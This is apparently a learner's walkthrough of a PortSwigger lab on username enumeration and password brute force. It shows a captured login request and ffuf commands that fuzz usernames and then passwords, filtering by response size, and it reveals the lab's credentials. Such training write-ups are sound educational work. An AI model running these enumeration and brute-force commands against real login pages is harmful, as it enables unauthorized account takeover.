This lab is vulnerable to username enumeration and password brute-force attacks. It has an account with a predictable username and password, which can be found in the following wordlists:

-   [Candidate usernames](https://portswigger.net/web-security/authentication/auth-lab-usernames)
-   [Candidate passwords](https://portswigger.net/web-security/authentication/auth-lab-passwords)

To solve the lab, enumerate a valid username, brute-force this user's password, then access their account page.

# Practical
So let's check out the login works, whenever we enter a wrong username it says:
```txt
Invalid Username
```
So what if we have a correct username? Would it say 'Invalid Password'? Let's enumerate to find out, Let's capture the request first and see how it works.
```html
POST /login HTTP/1.1
Host: target-accb1f7d1fad2bf38003041c0091007c.web-security-academy.net
Cookie: session=KJM2kAavnMHoeKocafQ8Q9J2StqigR4M
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Origin: https://target-accb1f7d1fad2bf38003041c0091007c.web-security-academy.net
Dnt: 1
Referer: https://target-accb1f7d1fad2bf38003041c0091007c.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Gpc: 1
Te: trailers
Connection: close

username=admin&password=1
````
So we send a POST request with the parameters username and password.
We can use Burp Intruder to brute force, but since I like speed, I'll be using ffuf.
```bash
ffuf -w usernames.txt -X POST -d "username=FUZZ&password=1" -u https://target-accb1f7d1fad2bf38003041c0091007c.web-security-academy.net/login -c -fs 3002
```
Since we're getting a lot of request returning with size 3002, we'll filter that out and we should get a correct username later.
```txt
alabama                 [Status: 200, Size: 3004, Words: 1143, Lines: 63]
```
We get alabama with a size of 3004, let's test the credential in the login page.
```txt
Invalid password
```
Great, so it is a valid username. Now we just need to brute-force the password. We can do this in ffuf too.
```bash
ffuf -w passwords.txt -X POST -d "username=alabama&password=FUZZ" -u https://target-accb1f7d1fad2bf38003041c0091007c.web-security-academy.net/login -c -fs 3004
```
We're getting a lot of size 3004, let's filter those out.
```bash
killer                  [Status: 302, Size: 0, Words: 1, Lines: 1]
```
And we get a request that was redirected, maybe because we successfully logged in and is being redirected to the user's page? Let's find out.
```txt
alabama.killer
```
And we're able to login and solve the lab.